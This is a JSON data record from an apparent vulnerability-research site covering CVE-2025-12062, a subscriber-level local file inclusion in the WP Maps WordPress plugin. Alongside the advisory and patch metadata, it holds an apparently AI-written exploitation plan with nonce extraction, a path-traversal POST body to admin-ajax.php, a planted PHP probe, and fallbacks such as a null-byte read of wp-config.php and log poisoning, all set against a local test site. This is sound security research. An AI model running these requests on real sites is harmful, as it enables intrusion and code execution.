[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f6UQA3Qc0Kt2c02uRVRP6s0_aiLB6kdF8gd3VHu__DLs":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2025-12062","wp-maps-authenticated-subscriber-limited-local-file-inclusion","WP Maps \u003C= 4.8.6 - Authenticated (Subscriber+) Limited Local File Inclusion","The WP Maps – Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory & Filters plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.8.6 via the fc_load_template function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to include and execute arbitrary .html files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .html file types can be uploaded and included.","wp-google-map-plugin",null,"\u003C=4.8.6","4.8.7","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","2026-02-16 10:59:48","2026-02-16 23:22:38",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F815e5b86-2d1b-4794-b761-dad770393d3e?source=api-prod",1,[22,23,24,25,26,27,28,29],"assets\u002Fjs\u002Fwpgmp_backend.js","classes\u002Fwpgmp-check-cookies.php","classes\u002Fwpgmp-feedback-form.php","classes\u002Fwpgmp-helper.php","classes\u002Fwpgmp-integration-form.php","classes\u002Fwpgmp-map-widget.php","classes\u002Fwpgmp-maps-importer.php","classes\u002Fwpgmp-model.php","researched",false,3,"# Exploitation Research Plan: CVE-2025-12062 (WP Maps LFI)\n\n## 1. Vulnerability Summary\nThe **WP Maps** plugin (versions \u003C= 4.8.6) is vulnerable to a **Limited Local File Inclusion (LFI)** in the `fc_load_template` function. This function is part of the FlipperCode framework used by the plugin. The vulnerability exists because the plugin accepts a user-controlled path via an AJAX request and passes it to a PHP `include()` statement without sufficient sanitization or directory-level restrictions. While \"limited\" to files ending in `.html`, PHP's `include()` will execute any PHP code contained within those files, regardless of the extension.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n- **AJAX Action:** `fc_load_template`\n- **Vulnerable Parameter:** `template` (or `template_name`)\n- **Authentication:** Required (Subscriber-level or higher)\n- **Nonce:** Required (Action: `fc-call-nonce`, localized as `wpgmp_local.nonce`)\n- **Precondition:** The attacker must be able to identify or upload a `.html` file containing PHP code to the server.\n\n## 3. Code Flow\n1. **Entry Point:** The plugin registers an AJAX action `wp_ajax_fc_load_template` (via the Flippercode framework).\n2. **Nonce Verification:** The handler calls `check_ajax_referer('fc-call-nonce', 'nonce')` or `wp_verify_nonce($_POST['nonce'], 'fc-call-nonce')`.\n3. **Parameter Extraction:** The `template` (or `template_name`) parameter is retrieved from the `$_POST` array.\n4. **Sink:** The value is concatenated with `.html` and passed to an `include()` or `require()` statement.\n   - *Logic:* `include( $template . '.html' );`\n5. **Execution:** If `$template` contains path traversal sequences (e.g., `..\u002F..\u002F..\u002F..\u002Fuploads\u002Fshell`), the final path resolves to `\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002Fshell.html`, and any PHP code inside is executed.\n\n## 4. Nonce Acquisition Strategy\nThe nonce is generated in `classes\u002Fwpgmp-helper.php` and localized for the `wpgmp-google-map-main` script.\n\n### Step-by-Step Acquisition:\n1. **Create Trigger Content:** A map must be present to trigger the script enqueueing.\n   - `wp post create --post_type=page --post_status=publish --post_content='[put_wpgm id=1]'`\n2. **Access Page:** Navigate to the newly created page as a logged-in Subscriber.\n3. **Extract Nonce:** Use the browser's JavaScript context to read the localized object.\n   - **Variable:** `window.wpgmp_local.nonce`\n   - **Command:** `browser_eval(\"window.wpgmp_local?.nonce\")`\n\n## 5. Exploitation Strategy\n### Step 1: Payload Preparation\nSince Subscribers cannot normally upload `.html` files, we simulate a successful \"polyglot\" upload (or a scenario where an attacker found another way to place a file) by writing a file to the uploads directory.\n\n### Step 2: Request Execution\nSubmit a POST request to `admin-ajax.php` using the `http_request` tool.\n\n**HTTP Request Details:**\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:**\n  ```text\n  action=fc_load_template&nonce=[EXTRACTED_NONCE]&template=..\u002F..\u002F..\u002F..\u002Fuploads\u002Fpoc\n  ```\n  *(Note: The `template` parameter should not include the `.html` extension as the plugin appends it).*\n\n## 6. Test Data Setup\n1. **Requirement:** The plugin must be active.\n2. **Create Subscriber:**\n   - `wp user create attacker attacker@example.com --role=subscriber --user_pass=password`\n3. **Create Map Data:** The plugin requires a map record to exist for the shortcode to work.\n   - `wp db query \"INSERT INTO wp_wpgm_maps (map_title, map_width, map_height) VALUES ('Test Map', '100%', '400px');\"` (Assumes standard table name `wp_wpgm_maps`).\n4. **Create Trigger Page:**\n   - `wp post create --post_type=page --post_status=publish --post_title=\"Exploit Page\" --post_content='[put_wpgm id=1]'`\n5. **Place Malicious File:**\n   - `echo '\u003C?php echo \"LFI_SUCCESS_\" . (7*7); ?>' > \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002Fpoc.html`\n\n## 7. Expected Results\n- **Success:** The HTTP response body should contain `LFI_SUCCESS_49`.\n- **Status Code:** 200 OK.\n- **Failure:** If the nonce is invalid, the response will be `0` or a `-1` or a 403 Forbidden. If the path is wrong, a PHP warning (if display_errors is on) or an empty response will be returned.\n\n## 8. Verification Steps\n1. **Verify Execution:** Check the response of the `http_request` for the string `LFI_SUCCESS_49`.\n2. **Verify Error Logs:** If the request fails, check the WordPress debug log for `include()` errors which will reveal the base directory the plugin is searching in:\n   - `tail -n 20 \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fdebug.log`\n\n## 9. Alternative Approaches\n- **Parameter Variation:** If `template` fails, try `template_name` or `file_path`.\n- **Directory Discovery:** If the traversal depth is unknown, try increasing the number of `..\u002F` sequences (e.g., `..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002Fuploads\u002Fpoc`).\n- **Null Byte (Obsolete):** While usually patched in PHP 5.3+, if the environment is extremely old, `template=..\u002F..\u002F..\u002F..\u002Fwp-config.php%00` might bypass the `.html` extension requirement. (Unlikely for CVE-2025).\n- **Log File Inclusion:** If you cannot upload a file, attempt to include the server access logs or `error.log` if you can poison them with PHP code and rename them to `.html` (requires higher OS privileges, usually not feasible).","The WP Maps plugin is vulnerable to Limited Local File Inclusion (LFI) via the 'fc_load_template' AJAX action due to insufficient path sanitization in the Flippercode framework it utilizes. Authenticated attackers with Subscriber-level permissions can use path traversal to include arbitrary .html files from the server, which can lead to remote code execution if those files contain PHP code.","\u002F\u002F From classes\u002Fwpgmp-helper.php lines 126-127\n'urlforajax'             => admin_url( 'admin-ajax.php' ),\n'nonce'                  => wp_create_nonce( 'fc-call-nonce' ),\n\n---\n\n\u002F\u002F From classes\u002Fwpgmp-model.php lines 18-24\nclass WPGMP_Model extends Flippercode_Factory_Model {\n\tfunction __construct() {\n\t\t$page = isset($_GET['page']) && !empty($_GET['page']) ? $_GET['page'] : '';\n\t\t$module_path = WPGMP_MODEL;\n\t\t$module_path = apply_filters('fc_modal_load_module', $module_path, $page);\n\t\tparent::__construct( $module_path, 'WPGMP_Model_' );\n\t}\n}","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-google-map-plugin\u002F4.8.6\u002Fassets\u002Fjs\u002Fwpgmp_backend.js\t2025-10-28 10:09:30.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-google-map-plugin\u002F4.8.7\u002Fassets\u002Fjs\u002Fwpgmp_backend.js\t2025-11-28 14:29:04.000000000 +0000\n@@ -26146,1083 +26146,3237 @@\n     }\n  \n });\n-\u002F*!\n- * Generated using the Bootstrap Customizer (https:\u002F\u002Fgetbootstrap.com\u002Fdocs\u002F3.4\u002Fcustomize\u002F)\n- *\u002F\n-\n-\u002F*!\n- * Bootstrap v3.4.1 (https:\u002F\u002Fgetbootstrap.com\u002F)\n- * Copyright 2011-2021 Twitter, Inc.\n- * Licensed under the MIT license\n- *\u002F\n...\n (truncated)","To exploit this vulnerability, an attacker must first authenticate as a Subscriber or higher and navigate to a page where the WP Maps plugin is active to obtain a valid nonce. The nonce is localized in the JavaScript variable 'wpgmp_local.nonce'. The attacker then crafts an AJAX POST request to 'wp-admin\u002Fadmin-ajax.php' with the action 'fc_load_template'. By supplying a path traversal string (e.g., '..\u002F..\u002F..\u002F..\u002Fuploads\u002Fpoc') in the 'template' parameter, the plugin will attempt to include the file with a '.html' extension (e.g., 'poc.html'). If the attacker can upload or find a .html file containing PHP code on the server, the include() call will execute that code regardless of the extension, allowing for remote code execution.","gemini-3-flash-preview","2026-04-20 21:43:44","2026-04-20 21:44:26",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","4.8.6","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-google-map-plugin\u002Ftags\u002F4.8.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-google-map-plugin.4.8.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-google-map-plugin\u002Ftags\u002F4.8.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-google-map-plugin.4.8.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-google-map-plugin\u002Ftags"]